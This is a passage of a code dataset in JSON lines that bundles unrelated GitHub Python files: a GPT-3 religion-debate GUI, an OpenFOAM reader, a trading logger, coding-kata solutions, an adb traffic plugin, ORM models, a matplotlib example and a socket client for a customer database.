self.compressor.compress(pickle.dumps(data))\n\n def unserialize(self, data):\n return pickle.loads(self.decompressor.decompress(data))\n","repo_name":"bxbrenden/groenmaker","sub_path":"mozci/util/cache_stores.py","file_name":"cache_stores.py","file_ext":"py","file_size_in_byte":7787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"24015686280","text":"import PySimpleGUI as Sg\nimport openai\nimport logging.config\nimport time\n\n\ndef create_layout(religions):\n layout = [\n [Sg.Text('Parameters Setting', font=('Helvetica', 20))],\n [Sg.Text('Nice Mode:'), Sg.Checkbox('ON', key=\"-niceModeOn-\")],\n [Sg.Text('Discussion between:'), Sg.Checkbox('human & 1 robot', key=\"-humanRobot-\"),\n Sg.Checkbox('2 robots', key=\"-twoRobots-\")],\n [Sg.Text('Religion:'), Sg.Text('robot 1'), Sg.Combo(religions, key=\"-religion1-\"), Sg.Text('robot 2'),\n Sg.Combo(religions, key=\"-religion2-\")],\n [Sg.Text('Discussion:', font=('Helvetica', 35))],\n [Sg.Output(key=\"-print-\", size=(180, 35))],\n [Sg.Button(\"Start\"), Sg.Button(\"Clear\")]\n ]\n return layout\n\n\ndef gpt3_call(prompt_text):\n response = openai.Completion.create(\n engine=\"davinci\",\n prompt=prompt_text,\n temperature=0.7,\n max_tokens=150,\n top_p=1,\n frequency_penalty=0.4,\n presence_penalty=0.4,\n stop=[\"Human:\", \"\\n\"],\n )\n story = response['choices'][0]['text']\n if str(story) == \"\" or not str(story):\n story = \"I don't know, can you elaborate?\"\n return prompt_text + str(story)\n\n\ndef run(config, intro=None):\n logger = logging.getLogger(__name__)\n logger.info('Start logging:')\n religions = list(config['religions'].keys())\n layout = create_layout(religions)\n window = Sg.Window('Deus Ex Machina Demo', layout=layout, scaling=2)\n while True:\n event, values = window.read()\n if event in (Sg.WIN_CLOSED, 'Quit'):\n break\n if event == 'Clear':\n window[\"-print-\"].update(\"\")\n if event == 'Start' and values[\"-humanRobot-\"]:\n window.Element('-religion2-').Update(visible=False)\n window.Element('-twoRobots-').Update(visible=False)\n if intro is None:\n intro = config[\"religions\"][values[\"-religion1-\"]]\n window[\"-print-\"].update(intro)\n question = Sg.popup_get_text(\"Your input: \")\n restart_sequence = \"Human: \"\n start_sequence = values[\"-religion1-\"]\n prompt_text = f'{intro}\\n{restart_sequence}: {question}\\n{start_sequence}:'\n intro = gpt3_call(prompt_text)\n window[\"-print-\"].update(intro)\n if event == 'Start' and values[\"-twoRobots-\"]:\n window.Element('-humanRobot-').Update(visible=False)\n restart_sequence = values[\"-religion1-\"]\n start_sequence = values[\"-religion2-\"]\n question = Sg.popup_get_text(\"Subject: \")\n intro = \"The {} religion is {}. \\n\" \\\n \"The {} religion is {}.\\n\" \\\n \"The following is a conversation between {} and {} about {}.\"\\\n .format(values[\"-religion1-\"],\n config[\"religions\"][values[\"-religion1-\"]],\n values[\"-religion2-\"],\n config[\"religions\"][values[\"-religion2-\"]],\n values[\"-religion2-\"],\n values[\"-religion1-\"],\n question)\n #prompt_text = f'{intro}\\n{start_sequence}: '\n prompt_text = \"{}\\n{}: \".format(intro, start_sequence)\n intro = gpt3_call(prompt_text)\n window[\"-print-\"].update(intro)\n turn = True\n for _ in range(12):\n if turn:\n prompt_text = intro + \"\\n\" + restart_sequence + \": \"\n turn = False\n else:\n prompt_text = intro + \"\\n\" + start_sequence + \": \"\n turn = True\n intro = gpt3_call(prompt_text)\n window[\"-print-\"].update(intro)\n window.Refresh()\n","repo_name":"mahakhat/APIhero","sub_path":"view/front.py","file_name":"front.py","file_ext":"py","file_size_in_byte":3782,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"25777413005","text":"\"\"\"\nBase interface for a reader class\n\"\"\"\nimport logging\n\nimport numpy as np\n\nfrom pydelling.readers import BaseReader\n\nlogger = logging.getLogger(__name__)\nimport Ofpp\nfrom pydelling.config import config\nimport logging\nfrom pathlib import Path\n\nlogger = logging.getLogger(__name__)\n\n\nclass OpenFoamReader(BaseReader):\n def __init__(self, filename=None):\n self.filename = Path(filename) if filename else Path(config.open_foam_reader.filename)\n logger.info(f\"Reading OpenFOAM mesh file from {self.filename}\")\n super().__init__(filename=self.filename)\n\n\n def open_file(self, filename):\n self.mesh = Ofpp.FoamMesh(self.filename)\n\n @property\n def cell_centers(self) -> np.array:\n if not config.globals.is_cell_centers_read:\n try:\n self.mesh.read_cell_centres(str(self.filename / \"0/C\"))\n logger.info(f\"Reading cell center locations from {self.filename / '0/C'}\")\n config.globals.is_cell_centers_read = True\n except:\n logger.info(f\"Reading cell center locations from {self.filename / 'constant/C'}\")\n self.mesh.read_cell_centres(str(self.filename / \"constant/C\"))\n config.globals.is_cell_centers_read = True\n\n return self.mesh.cell_centres\n\n @property\n def cell_volumes(self) -> np.array:\n if not config.globals.is_cell_volumes_read:\n try:\n self.mesh.read_cell_volumes(str(self.filename / \"0/V\"))\n logger.info(f\"Reading cell volume locations from {self.filename / '0/V'}\")\n config.globals.is_cell_volumes_read = True\n except:\n logger.info(f\"Reading cell volume locations from {self.filename / 'constant/V'}\")\n self.mesh.read_cell_volumes(str(self.filename / \"constant/V\"))\n config.globals.is_cell_volumes_read = True\n\n return self.mesh.cell_volumes\n\n def get_data(self) -> np.ndarray:\n \"\"\"\n Outputs the read data\n :return:\n \"\"\"\n return np.array(0)\n\n def build_info(self):\n \"\"\"\n Generates a dictionary containing the basic info of the read data\n :return:\n \"\"\"\n self.info = {}\n\n","repo_name":"aitirga/pydelling","sub_path":"pydelling/readers/OpenFoamReader.py","file_name":"OpenFoamReader.py","file_ext":"py","file_size_in_byte":2245,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"5"} +{"seq_id":"40770189877","text":"# Standard library imports\nimport sys\nimport os\nfrom datetime import datetime\n\n# Update sys.path for local application imports\nsys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), '', '..', '..')))\n\n# Local application/library specific imports\nfrom utilities.report_email import Email\nfrom utilities.logger import Logger\n\n\nclass ReportManager:\n def __init__(self):\n #self.email = Email()\n self.logger = Logger().get_logger()\n\n def log_trade_data(self, trading_data):\n # Construct the trade report string\n trade_report = \"\\n\" + 100 * \"-\" + \"\\n\"\n trade_report += \"{} | {}\\n\".format(trading_data[\"time\"], trading_data[\"trade_action\"])\n trade_report += \"Strategies: {}\\n\".format(trading_data[\"strategy_names\"])\n trade_report += \"Ticker: {}\\n\".format(trading_data[\"ticker\"])\n trade_report += \"{} | Base_Units = {} | Quote_Units = {} | Price = {} \\n\".format(trading_data[\"time\"],\n trading_data[\"base_units\"],\n trading_data[\"quote_units\"],\n trading_data[\"price\"])\n trade_report += \"{} | Profit = {} | CumProfits = {} \\n\".format(trading_data[\"time\"],\n trading_data[\"real_profit\"],\n trading_data[\"cumulative_profits\"])\n trade_report += 100 * \"-\" + \"\\n\"\n\n # Log the trade report\n self.logger.info(trade_report)\n\n def send_email_report(self, trading_data):\n now = datetime.now()\n # If it's the beginning of an hour divisible by 4, send the email\n if now.hour % 4 == 0 and now.minute == 0:\n # Enhanced email content for clarity and better presentation\n text = f\"\"\"Trading Report:\n--------------------------------\nTime: {now.strftime('%Y-%m-%d %H:%M:%S')}\nAction: {trading_data[\"trade_action\"]}\nNumber of Trades: {trading_data[\"total_trades\"]}\nProfit: {trading_data[\"real_profit\"]}\nCumulative Profits: {trading_data[\"cumulative_profits\"]}\n--------------------------------\nThank you for using our trading system.\n\"\"\"\n self.email.send_email(text)\n\n\n\n","repo_name":"Usam95/backtester","sub_path":"deployment/binance/report_manager.py","file_name":"report_manager.py","file_ext":"py","file_size_in_byte":2404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"33889005784","text":"\"\"\"\nGiven a list of integers and a single sum value, return the first two values (parse from the left please)\nin order of appearance that add up to form the sum.\n\"\"\"\n\n\ndef sum_pairs(lst, s):\n cache = set()\n for i in lst:\n if s - i in cache:\n return [s - i, i]\n cache.add(i)\n\n\nprint(sum_pairs([]))","repo_name":"CapMath/Codewars_Python","sub_path":"5kyu/Sum of pairs.py","file_name":"Sum of pairs.py","file_ext":"py","file_size_in_byte":327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"5304274927","text":"import re\nfrom collections import namedtuple\n\nfrom ppadb.plugins import Plugin\n\nState = namedtuple(\"TrafficState\", [\n 'idx',\n 'iface',\n 'acct_tag_hex',\n 'uid_tag_int',\n 'cnt_set',\n 'rx_bytes',\n 'rx_packets',\n 'tx_bytes',\n 'tx_packets',\n 'rx_tcp_bytes',\n 'rx_tcp_packets',\n 'rx_udp_bytes',\n 'rx_udp_packets',\n 'rx_other_bytes',\n 'rx_other_packets',\n 'tx_tcp_bytes',\n 'tx_tcp_packets',\n 'tx_udp_bytes',\n 'tx_udp_packets',\n 'tx_other_bytes',\n 'tx_other_packets',\n])\n\n\nclass Traffic(Plugin):\n def get_traffic(self, package_name):\n cmd = 'dumpsys package {} | grep userId'.format(package_name)\n result = self.shell(cmd).strip()\n\n pattern = \"userId=([\\d]+)\"\n\n if result:\n match = re.search(pattern, result)\n uid = match.group(1)\n else:\n # This package is not existing\n return None\n\n cmd = 'cat /proc/net/xt_qtaguid/stats | grep {}'.format(uid)\n result = self.shell(cmd)\n\n def convert(token):\n if token.isdigit():\n return int(token)\n else:\n return token\n\n states = []\n if result:\n for line in result.strip().split('\\n'):\n values = map(convert, line.split())\n states.append(State(*values))\n\n return states\n else:\n return None\n","repo_name":"Swind/pure-python-adb","sub_path":"ppadb/plugins/device/traffic.py","file_name":"traffic.py","file_ext":"py","file_size_in_byte":1420,"program_lang":"python","lang":"en","doc_type":"code","stars":503,"dataset":"github-code","pt":"5"} +{"seq_id":"8336182087","text":"from django.db import models\nfrom django.core.validators import MaxValueValidator, MinValueValidator\n\n\n# Create your models here.\nclass Bonus(models.Model):\n class Meta:\n verbose_name_plural = 'Bonuses'\n\n name = models.CharField(max_length=50)\n is_active = models.BooleanField(default=False)\n expires_on = models.DateField()\n description = models.CharField(help_text=\"Describes what the amount is for on a discount by discount basis.\", max_length=256)\n amount = models.IntegerField(validators=[MinValueValidator(1), MaxValueValidator(100)])\n created_at = models.DateTimeField(auto_now_add=True)\n\n def __str__(self):\n return self.name\n","repo_name":"ErikaN-ir/django-fullstack-milestone-project","sub_path":"bag/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"7955657287","text":"\"\"\"\nPlacing text boxes\n==================\n\nWhen decorating axes with text boxes, two useful tricks are to place the text\nin axes coordinates (see :ref:`transforms_tutorial`),\nso the text doesn't move around with changes in x or y limits. You\ncan also use the ``bbox`` property of text to surround the text with a\n`~matplotlib.patches.Patch` instance -- the ``bbox`` keyword argument takes a\ndictionary with keys that are Patch properties.\n\"\"\"\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nnp.random.seed(19680801)\n\nfig, ax = plt.subplots()\nx = 30*np.random.randn(10000)\nmu = x.mean()\nmedian = np.median(x)\nsigma = x.std()\ntextstr = '\\n'.join((\n r'$\\mu=%.2f$' % (mu, ),\n r'$\\mathrm{median}=%.2f$' % (median, ),\n r'$\\sigma=%.2f$' % (sigma, )))\n\nax.hist(x, 50)\n# these are matplotlib.patch.Patch properties\nprops = dict(boxstyle='round', facecolor='wheat', alpha=0.5)\n\n# place a text box in upper left in axes coords\nax.text(0.05, 0.95, textstr, transform=ax.transAxes, fontsize=14,\n verticalalignment='top', bbox=props)\n\nplt.show()\n","repo_name":"matplotlib/matplotlib","sub_path":"galleries/examples/text_labels_and_annotations/placing_text_boxes.py","file_name":"placing_text_boxes.py","file_ext":"py","file_size_in_byte":1054,"program_lang":"python","lang":"en","doc_type":"code","stars":18437,"dataset":"github-code","pt":"5"} +{"seq_id":"71144081113","text":"\"\"\"\n gold4 : 작업\n URL = https://www.acmicpc.net/problem/2056\n 위상정렬(순서가 정해져 있는 작업)\n\"\"\"\n\nimport sys\n\ndef main():\n N = int(sys.stdin.readline().strip())\n\n child = [[] for _ in range(N+1)]\n parent = [[] for _ in range(N+1)]\n edge_num = [0 for _ in range(N+1)]\n time = [0 for _ in range(N+1)]\n\n for i in range(1,N+1):\n work = list(map(int, sys.stdin.readline().strip().split()))\n\n time[i] = work[0]\n parent_num = work[1]\n for j in range(parent_num):\n parent[i].append(work[j+2])\n child[work[j+2]].append(i)\n \n for i in range(1, N+1):\n edge_num[i] = len(parent[i])\n\n tmp = []\n for i in range(1, N+1):\n if not parent[i]:\n tmp.append(i)\n \n for a in tmp:\n q = []\n q.append(a)\n while q:\n next_ = q.pop(0)\n\n for i in child[next_]:\n edge_num[i] -= 1\n\n if edge_num[i] == 0:\n q.append(i)\n\n max_time = 0\n for j in parent[i]:\n if max_time < time[j]:\n max_time = time[j]\n time[i] += max_time\n \n print(max(time))\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"D-kuri/algorithm","sub_path":"baekjoon/2056.py","file_name":"2056.py","file_ext":"py","file_size_in_byte":1290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"7353681204","text":"from sqlalchemy import Column, ForeignKey, UniqueConstraint\nfrom sqlalchemy.orm import relationship, backref\nfrom sqlalchemy.dialects.mysql import VARCHAR, INTEGER, DOUBLE\nfrom models import Base, CustomModel, User, Pizza\n\n\nclass Order(Base, CustomModel):\n __tablename__ = 'orders'\n user_id = Column(INTEGER, ForeignKey(User.id))\n user = relationship(User, backref='orders')\n shipping_address = Column(VARCHAR(255), nullable=False)\n billing_address = Column(VARCHAR(255), nullable=False)\n price = Column(DOUBLE, nullable=False, default=0.00)\n pizza = relationship(Pizza, secondary='order_pizza')\n\n\nclass OrderedPizza(Base, CustomModel):\n __tablename__ = 'order_pizza'\n __table_args__ = (UniqueConstraint('order_id', 'pizza_id'),)\n\n order_id = Column(INTEGER, ForeignKey(Order.id))\n order = relationship(Order, backref=backref('order_pizza', cascade='all, delete-orphan'))\n\n pizza_id = Column(INTEGER, ForeignKey(Pizza.id))\n pizza = relationship(Pizza, backref=backref('order_pizza', cascade='all, delete-orphan'))\n\n quantity = Column(INTEGER, nullable=False, default=1)\n","repo_name":"ciurezbogdan/nt_desktop_app","sub_path":"models/orders.py","file_name":"orders.py","file_ext":"py","file_size_in_byte":1112,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"44210813041","text":"#!/usr/bin/python3\n\nimport socket\nimport sys\n\ndef main():\n conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n conn.connect(('localhost', 9999))\n conn.sendall((\"MAINMENUREQ\").encode(\"UTF-8\"))\n mainMenu = conn.recv(1024).decode(\"UTF-8\")\n while True:\n # while True:\n inputMenuValue = getMenuInput(mainMenu)\n if (int(inputMenuValue) == 1):\n customerNameForRet = getCustomerNameToFind()\n conn.sendall((\"FINDCUSTOMER,\"+customerNameForRet.lower()).encode(\"UTF-8\"))\n responseServerDB = conn.recv(1024).decode(\"UTF-8\")\n print(customerNameForRet+\"\"\"'s detail: \"\"\")\n print(\" \"+responseServerDB)\n print(\"-----------------------------------\")\n elif (int(inputMenuValue) == 2):\n customerDetailToAdd = getCustomerDetailToAdd()\n if not (customerDetailToAdd == \"\"):\n conn.sendall((\"ADDCUSTOMER,\"+customerDetailToAdd).encode(\"UTF-8\"))\n responseServerDB = conn.recv(1024).decode(\"UTF-8\")\n print(responseServerDB)\n print(\"-----------------------------------\")\n elif (int(inputMenuValue) == 3):\n customerNametoDelete = getCustomerNameToDelete()\n conn.sendall((\"DELETECUSTOMER,\" + customerNametoDelete.lower()).encode(\"UTF-8\"))\n responseServerDB = conn.recv(1024).decode(\"UTF-8\")\n print(responseServerDB)\n elif (int(inputMenuValue) == 4):\n customerNameForUpdate = getCustomerNameForUpdate()\n if not (customerNameForUpdate.replace(\" \",\"\") == \"\"):\n customerAgeToUpdate = input(\"Enter new age for update:\")\n conn.sendall((\"UPDATEAGE,\"+customerNameForUpdate+\",\"+customerAgeToUpdate.replace(\" \",\"\")).encode(\"UTF-8\"))\n responseServerDB = conn.recv(8000).decode(\"UTF-8\")\n print(responseServerDB)\n elif (int(inputMenuValue) == 5):\n customerNameForUpdate = getCustomerNameForUpdate()\n if not (customerNameForUpdate.replace(\" \", \"\") == \"\"):\n customerAddressToUpdate = input(\"Enter new address for update:\")\n conn.sendall((\"UPDATEADDRESS,\" + customerNameForUpdate + \",\" + customerAddressToUpdate.replace(\" \", \"\")).encode(\"UTF-8\"))\n responseServerDB = conn.recv(8000).decode(\"UTF-8\")\n print(responseServerDB)\n elif (int(inputMenuValue) == 6):\n customerNameForUpdate = getCustomerNameForUpdate()\n if not (customerNameForUpdate.replace(\" \", \"\") == \"\"):\n customerAddressToUpdate = input(\"Enter new phone number for update:\")\n conn.sendall((\"UPDATEPHONE,\" + customerNameForUpdate + \",\" + customerAddressToUpdate.strip()).encode(\"UTF-8\"))\n responseServerDB = conn.recv(8000).decode(\"UTF-8\")\n print(responseServerDB)\n elif (int(inputMenuValue) == 7):\n conn.sendall((\"PRINTREPORT\").encode(\"UTF-8\"))\n responseServerDB = conn.recv(8000).decode(\"UTF-8\")\n print(responseServerDB)\n elif (int(inputMenuValue) == 8):\n conn.close()\n print(\"Good bye\")\n sys.exit()\n\ndef getCustomerNameToFind():\n while True:\n customerNameToFind = input(\"Enter Customer Name to find: \")\n if not (customerNameToFind.replace(\" \",\"\") == \"\"):\n return customerNameToFind.lower().replace(\",\",\"-\")\n\ndef getCustomerNameForUpdate():\n while True:\n customerNameToFind = input(\"Enter Customer Name to find \"+'\\n'+\"or enter blank to go to main menu: \")\n if not (customerNameToFind.replace(\" \",\"\") == \"\"):\n return (customerNameToFind.lower().replace(\",\",\"-\"))\n return \"\"\n\ndef tryParseInt(numberForParse):\n try:\n (int(numberForParse))\n return True\n except:\n return False\n\ndef getCustomerNameToDelete():\n while True:\n customerNameToDelete = input(\"Enter Customer Name to find: \")\n if not (customerNameToDelete.replace(\" \",\"\") == \"\"):\n return customerNameToDelete.lower().replace(\",\",\"-\")\n\ndef getCustomerDetailToAdd():\n print(\"\"\"Here we need the customer info to add.\n Name of customer is required.\n To Go back to the menu put 0 (Zero number) for customer name\"\"\")\n customerNameToAdd = \"\"\n while True:\n customerNameToAdd = input(\"Customer Name: \")\n if not (customerNameToAdd.replace(\" \",\"\") == \"\"):\n break\n else:\n print(\"Customer name cannot be blank.\")\n if not (customerNameToAdd == \"0\"):\n customerAgeToAdd = input(\"Customer Age: \")\n customerAddressToAdd = input(\"Customer Address: \")\n customerPhoneToAdd = input(\"Customer Phone:\")\n customerConcatinatedDetailsToAdd = customerNameToAdd.lower().replace(\",\",\"-\")+\"|\"+customerAgeToAdd.replace(\",\",\"-\")+\"|\"+customerAddressToAdd.replace(\",\",\"-\")+\"|\"+customerPhoneToAdd.replace(\",\",\"-\")\n return customerConcatinatedDetailsToAdd\n else:\n return \"\"\n\n\ndef getMenuInput(mainMenu):\n while True:\n print(mainMenu)\n selectValueItem = input(\"Select: \")\n if not ((tryParseInt(selectValueItem))):\n print(\"\"\"Your should select a number,\n do not enter alphabets\"\"\")\n elif ((int(selectValueItem) < 1) or (int(selectValueItem) > 8)):\n print(\"Invalid input, enter your select item in range (1-8).\")\n else:\n return selectValueItem\n\n\nmain()","repo_name":"FarzadShamriz/ClientServerPythonSample","sub_path":"ClientDB.py","file_name":"ClientDB.py","file_ext":"py","file_size_in_byte":5475,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"41187898546","text":"import random\n\nwhile True:\n num = 0\n cnt = 0\n r = 0\n ran = []\n num = int(input('Input number..?'))\n if num > 0 and num < 10:\n for i in range(0,20):\n r = random.randint(0,10)\n ran.append(r)\n for k in ran:\n if k == num:\n cnt += 1\n print(cnt)\n\n\n\n\n\n\n","repo_name":"jaywoong/learn_python","sub_path":"day06/test05.py","file_name":"test05.py","file_ext":"py","file_size_in_byte":333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"24258179111","text":"def part1(data):\n string = data\n\n # Part 1\n # space = 272\n # Part 2\n space = 35651584\n\n def dragon_curve(string, space):\n if len(string) >= space:\n return string\n \n a = string\n b = string[::-1]\n c = ''\n for char in b:\n if char == '1':\n c += '0'\n else:\n c += '1'\n\n d = a + '0' + c\n return dragon_curve(d, space)\n\n def get_checksum(string, calculated):\n if calculated > 0 and len(string) % 2 != 0:\n return string\n \n checksum = ''\n for i in range(0, len(string), 2):\n if string[i] == string[i + 1]:\n checksum += '1'\n else:\n checksum += '0'\n \n return get_checksum(checksum, calculated + 1)\n\n\n new_string = dragon_curve(string, space)\n checksum = get_checksum(new_string[0:space], 0)\n return checksum\n","repo_name":"Panda4817/Advent-Of-Code-2016","sub_path":"16.py","file_name":"16.py","file_ext":"py","file_size_in_byte":882,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"18927605173","text":"import pandas as pd\nimport numpy as np\nimport csv \n\nfrom account import Account\n\nclass BBand(object):\n\n def __init__(self, portfolio = [], weights = [], path='../storage/daily/tickers/'):\n self.portfolio = portfolio\n self.path = path\n self.weights = weights\n self.account = Account('bband', 100000)\n if not len(weights):\n self.weights = self.create_portfolio_split()\n\n def create_portfolio_split(self):\n num = len(self.portfolio)\n equal_weights = int(100. / num) / 100.\n weights = {}\n for p in self.portfolio:\n weights[p] = equal_weights\n return weights\n\n def get_portfolio_data(self):\n data = []\n for p in self.portfolio:\n symdata = pd.read_csv(self.path + p)\n data.append(symdata)\n self.data = data\n return self.data\n\n def upper_hit(self, row):\n if row[1].close > row[1].UBAND:\n return 1\n else:\n return 0\n\n def lower_hit(self, row):\n if row[1].close < row[1].LBAND:\n return 1\n else:\n return 0\n\n\n def walkthrough(self, sym, data, start, end):\n df = data[(data.date >=start) & (data.date <= end)]\n #print(len(df))\n #print(df[df.date == start])\n #print(df[df.date == start].close.item())\n #numshares = int(self.account.balance / df[df.date == start].close.item())\n #print('starting quantity', start, numshares, self.account.balance)\n #numshares = self.account.buy('AAPL', numshares, df[df.date == start].close.item())\n #print('starting buy', start, numshares, self.account.balance)\n numshares = 0\n df = df[::-1]\n for i in df.iterrows():\n if i[1].date == start:\n continue\n if i[1].close > i[1].UBAND and numshares > 0:\n numshares = self.account.sell(sym, numshares, df[df.date == i[1].date].close.item())\n print('upper hit: new quantity', i[1].date, numshares, self.account.balance)\n elif i[1].close < i[1].LBAND and numshares == 0:\n numshares = int(self.account.balance / df[df.date == i[1].date].close.item())\n numshares = self.account.buy(sym, numshares, df[df.date == i[1].date].close.item())\n print('lower hit: new quantity', i[1].date, numshares, self.account.balance)\n if numshares > 0:\n numshares = self.account.sell(sym, numshares, df[df.date == end].close.item())\n print(self.account.balance)\n\n\n def portfolio_walkthrough(self, data_list, start, end):\n dfs = [data[(data.date >=start) & (data.date <= end)] for data in data_list]\n #print('starting buy', start, numshares, self.account.balance)\n numshares = {}\n # loop through each day for each symbol\n for sym, df in zip(self.portfolio, dfs):\n df = df[::-1]\n # check the individual weights and balances along with bbands\n for i in df.iterrows():\n #print(i[0])\n if i[1].date == start:\n numshares[sym] = 0\n if i[1].close > i[1].UBAND and numshares[sym] > 0:\n numshares[sym] = self.account.sell(sym, numshares[sym], df[df.date == i[1].date].close.item())\n print('upper hit: new quantity', i[1].date, numshares[sym], self.account.balance)\n elif i[1].close < i[1].LBAND and numshares[sym] == 0:\n numshares[sym] = int((self.account.balance*self.weights[sym]) / df[df.date == i[1].date].close.item())\n numshares[sym] = self.account.buy(sym, numshares[sym], df[df.date == i[1].date].close.item())\n print('lower hit: new quantity', i[1].date, numshares[sym], self.account.balance)\n if numshares[sym] > 0:\n numshares[sym] = self.account.sell(sym, numshares[sym], df[df.date == end].close.item())\n print(self.account.balance)\n \n\n\nif __name__ == '__main__':\n sim = BBand(portfolio=['AAPL'])\n print(sim.portfolio)\n sim.get_portfolio_data()\n #print(len(sim.data))\n\n # make sure start and end are valid trading days!!\n sim.walkthrough(sim.portfolio[0], sim.data[0], \"2019-02-11\", \"2022-02-10\")\n sim = BBand(portfolio=['AAPL', 'AMD'])\n sim.get_portfolio_data()\n sim.portfolio_walkthrough(sim.data, \"2019-02-11\", \"2022-02-10\")\n","repo_name":"stvschmdt/fin_playground","sub_path":"src/bband_strategy.py","file_name":"bband_strategy.py","file_ext":"py","file_size_in_byte":4441,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"11329331643","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def middleNode(self, head):\n len_list = 0\n node = head\n while node:\n node = node.next\n len_list += 1\n mid = len_list // 2\n i = 0\n node = head\n while node:\n if i == mid:\n return node\n i+=1\n node = node.next\n \n# another solution\n# class Solution:\n# def middleNode(self, head: Optional[ListNode]) -> Optional[ListNode]:\n# slow = fast = head\n# while fast and fast.next:\n# slow = slow.next\n# fast = fast.next.next\n# return slow","repo_name":"SadriddinDev/LeetCode","sub_path":"Problems/middle-of-the-linked-list.py","file_name":"middle-of-the-linked-list.py","file_ext":"py","file_size_in_byte":775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"33644979936","text":"'''The game predict a number\nthe computer self create and predict the number'''\n\nimport numpy as np\n\nnumber = np.random.randint(1, 101) # create number\n\n\ndef random_predict(number:int=1) -> int:\n ''' random predict the number\n \n Args:\n number (int, optional): create the number. Defaults to 1.\n \n Returns:\n int: caunt of attempts\n '''\n \n count = 0\n\n while True:\n count += 1\n predict_number = np.random.randint(1, 101) \n \n if predict_number == number:\n # print(f'You predict the number! This number is {number}, {count} attempt')\n break\n \n return count\n\n \ndef score_game(random_predict) -> int:\n '''[summary]\n \n Args:\n random_predict ([type]): function prediction\n \n Returns:\n int: mean count of attempt\n '''\n count_ls = []\n np.random.seed(42)\n random_array = np.random.randint(1, 101, size=(1000))\n \n for number in random_array:\n count_ls.append(random_predict(number))\n \n score = int(np.mean(count_ls))\n print(f'your algorifm gess the number in mean {score} attempts')\n return score\n \n\nif __name__ == '__main__':\n score_game(random_predict)","repo_name":"Ruslan-Lis/SF","sub_path":"game_v2.py","file_name":"game_v2.py","file_ext":"py","file_size_in_byte":1225,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"42931365468","text":"import vits\r\nimport os\r\ndef load_models(): \r\n root='./vits/models/'\r\n modelList={}\r\n for path, file_dir, files in os.walk(root):\r\n for file_name in files:\r\n modelList[file_name[:-4]]=0\r\n root='./vits/configs/'\r\n configList={}\r\n for path, file_dir, files in os.walk(root):\r\n for file_name in files:\r\n configList[file_name[:-5]]=0\r\n ans=''\r\n for k, v in configList.items(): \r\n if k in modelList: \r\n ans=k\r\n break\r\n return ans\r\nstartVits=load_models()\r\nansNet=None # vits model\r\nif startVits!='': \r\n hp=\"./vits/configs/\"+startVits+\".json\"\r\n mp=\"./vits/models/\"+startVits+\".pth\"\r\n ansNet=vits.vitsModel(hp_path=hp, model_path=mp)\r\nsid=0\r\n\r\nfrom playsound import playsound\r\n\r\nimport chatGpt.chatgptConeect as cc\r\nimport json\r\ndef load_api_keys(): \r\n path='./chatGpt/openai_api_key.json'\r\n with open(path) as f: \r\n data = json.load(f)\r\n if len(data[\"keys\"])>0: \r\n cc.changeApiKey(data[\"keys\"][0])\r\nload_api_keys()\r\nchatNet=cc.chatgptContinueConnect()\r\n\r\nimport text_dealing as td\r\n\r\ndef playAu(): \r\n playsound('cache/audio/audio.wav')\r\n\r\nfrom flask import Flask, jsonify\r\n\r\napp = Flask(__name__)\r\n\r\n@app.route('/echo/')\r\ndef echo(text):\r\n return jsonify(f'you input text is {text}')\r\n\r\n@app.route('/chatting/')\r\ndef chatting(text):\r\n rep=chatNet.reply(text)\r\n return jsonify(rep)\r\n\r\n@app.route('/voice/')\r\ndef voice(text): \r\n text=td.select_lang_mode(text)\r\n ansNet.text_to_audio(text=text, speaker_id=sid)\r\n playAu()\r\n return jsonify(text)\r\n\r\n@app.route('/changeVitsNet/')\r\ndef changeVitsNet(text): \r\n global ansNet\r\n hp=\"./vits/configs/\"+text+\".json\"\r\n mp=\"./vits/models/\"+text+\".pth\"\r\n ansNet=vits.vitsModel(hp_path=hp, model_path=mp)\r\n return jsonify(text)\r\n\r\n@app.route('/changeApiKey/')\r\ndef changeApiKey(text): \r\n cc.changeApiKey(text)\r\n return jsonify(text)\r\n\r\n@app.route('/changeSid/')\r\ndef changeSid(speaker): \r\n global sid\r\n sid=int(speaker)\r\n return jsonify(speaker)\r\n\r\nif __name__ == '__main__':\r\n port = 7777\r\n host = '0.0.0.0'\r\n app.run(host,port=port)","repo_name":"Lambda7-del/live2d-vits-chatting-bot","sub_path":"api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":2187,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"5"} +{"seq_id":"29989807932","text":"import torch\nfrom torch import nn\nfrom torch.nn import functional as F\nfrom model.plot_helper import plot_recon\nimport lightning.pytorch as pl\nfrom abc import abstractmethod\nfrom lightning.pytorch.loggers.wandb import WandbLogger\nfrom lightning.pytorch.loggers.csv_logs import CSVLogger\n\n\nclass Autoencoder(pl.LightningModule):\n\n def __init__(self, 